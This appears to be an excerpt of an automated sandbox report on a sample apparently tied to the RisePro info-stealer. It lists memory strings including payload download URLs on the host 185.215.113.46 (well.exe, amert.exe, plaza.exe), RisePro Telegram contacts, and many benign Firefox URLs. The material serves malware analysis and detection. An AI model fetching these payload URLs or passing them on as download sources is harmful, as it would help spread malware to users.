                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exex
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exe
                          Source: I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exe2
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exeBuil
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exePB
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exeaw
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exeom0
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exet
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exex)
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CCC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe$
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe4
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe=;5
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe?
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exeINTEGERN
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exeS
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exebB
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exeg
                          Source: MPGPH131.exe, 00000006.00000002.3401083597.00000000062BE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exe
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exe0
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exeM
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exee
                          Source: I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2602177921.0000000005D07000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exegVA
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exeheidi9NcUyPNf3YG5
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exeiB
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/
                          Source: firefox.exe, 00000024.00000003.2553512433.0000015462538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 00000024.00000003.2682813977.00000154620E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 00000024.00000003.2553512433.0000015462538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                          Source: firefox.exe, 00000024.00000003.2553512433.0000015462538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-04/schema#
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-06/schema#
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#-
                          Source: firefox.exe, 00000024.00000003.2708670257.000001545C497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2577653183.000001545C496000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org
                          Source: firefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/
                          Source: firefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/0c
                          Source: firefox.exe, 00000024.00000003.3065217085.0000015453A7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3043257931.0000015454ECE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3343901655.0000015453A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2681200219.000001545C450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2462909736.0000015453D96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3061707200.000001545E3D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3065069570.0000015453AA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3327988001.0000015453D9A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2972373655.0000015453DB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C18A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3238352322.000001546319A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2502897099.000001545E3D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2468329463.00000154535C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2568116959.000001545E3D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3224963305.0000015463497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 
00000024.00000003.3333878095.000001545C44F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3070437706.0000015453AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: firefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/Z
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
                          Source: firefox.exe, 00000024.00000003.2557113466.000001545593C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: I2jCDr35mu.exe, 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, I2jCDr35mu.exe, 00000000.00000003.2093800693.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3322219545.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000003.2145688572.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3200225200.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000003.2145890043.0000000005190000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2346163083.0000000000351000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000008.00000003.2256368231.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000003.2356250685.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2622415113.0000000000351000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                          Source: firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 00000024.00000003.2682620775.00000154620EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                          Source: firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2679446441.0000015462266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com
                          Source: firefox.exe, 00000024.00000003.2680049158.0000015462239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/
                          Source: firefox.exe, 00000024.00000003.2680049158.0000015462235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C2CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2705767411.000001545C2CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2700569964.000001545E4CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 00000024.00000003.3149769273.000001546379D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 00000024.00000003.2543948249.00000154624C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
                          Source: firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT35JH&=V
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot$
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot;
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botFB
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botG
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bote
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_bot
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botriseprov
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.x
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 00000024.00000003.2556318655.000001545FDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
                          Source: firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2512039904.000001545C195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                          Source: firefox.exe, 00000024.00000003.2682813977.00000154620E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 00000024.00000003.2705767411.000001545C2EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: firefox.exe, 00000024.00000003.2683298473.0000015462047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: firefox.exe, 00000024.00000003.2512556062.0000015461F32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2508540911.000001545C141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                          Source: firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 00000024.00000003.2682498384.00000154620FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2466570051.00000154500BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 00000024.00000003.2680917978.0000015462217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
                          Source: firefox.exe, 00000024.00000003.3149769273.000001546379D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 00000024.00000003.2544170039.0000015462470000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2544441919.000001546244B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.000001546317C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3119695544.000001546319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 00000024.00000003.2550713166.000001546253B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: firefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: firefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com--attempting-deelevation
                          Source: firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3162934326.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3226617905.0000015461F4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3279722819.000001545C4B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3101971080.000001546273D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108638355.0000015461F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3272678888.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3256356812.0000015455286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Z
                          Source: firefox.exe, 0000001F.00000002.2388590768.00000159B5200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comC:

                          System Summary

                          Source: I2jCDr35mu.exe, 00000000.00000003.2301162754.00000000060E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d3c3d692-2
                          Source: MPGPH131.exe, 00000006.00000003.2671445352.0000000006719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5096619-c
                          Source: MPGPH131.exe, 00000007.00000003.2450769589.000000000679A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3a219e65-9
